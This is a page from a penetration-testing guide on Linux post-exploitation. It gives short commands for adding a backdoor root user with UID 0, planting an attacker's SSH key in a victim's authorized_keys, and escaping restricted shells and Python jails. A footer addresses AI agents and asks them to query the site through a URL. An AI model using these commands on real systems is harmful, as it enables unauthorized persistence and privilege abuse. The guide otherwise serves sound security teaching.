# Linux

## Introduction

In this section, you will find several useful commands for the Post-Exploitation phase in Linux systems.

## User

### Creating a user

```bash
sudo useradd [-m] <USERNAME>
```

### Add a user to a group

```bash
sudo usermod -aG <GROUP> <USERNAME>
```

### Create an alternative root user

```bash
useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>
```

## Login through SSH

There are times when we have a remote terminal as a user but we want to have access as that user via SSH although **we do not know** their **password**. SSH keys are used for these cases.

1. Generate a SSH key pair.

```bash
kali@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
[...]
```

1. Add the public key to the victim's file `~/.ssh/authorized_keys`:

```bash
echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys
```

1. Log in.

```bash
ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>
```

## Shell Escapes

It could be the case that you have obtained access to a restricted shell allowing you to perform a minimal amount of commands and preventing you from accessing other directories or files.

In this section, you will find some ways to escape those restricted shells.

### SSH

```bash
ssh <USERNAME>@<TARGET_I -t "bash --noprofile -i"
```

### Python Jail

```bash
echo os.system('/bin/bash')
```

For more examples of how to escape restricted shells, read the following articles.

* [rbash escape | rbash restricted shell escape](https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/)
* [Escaping Restricted Linux Shells](https://www.sans.org/blog/escaping-restricted-linux-shells/)
* [Escaping python jails](https://anee.me/escaping-python-jails-849c65cf306e)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-pentesting-guide.marmeus.com/general/linux.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.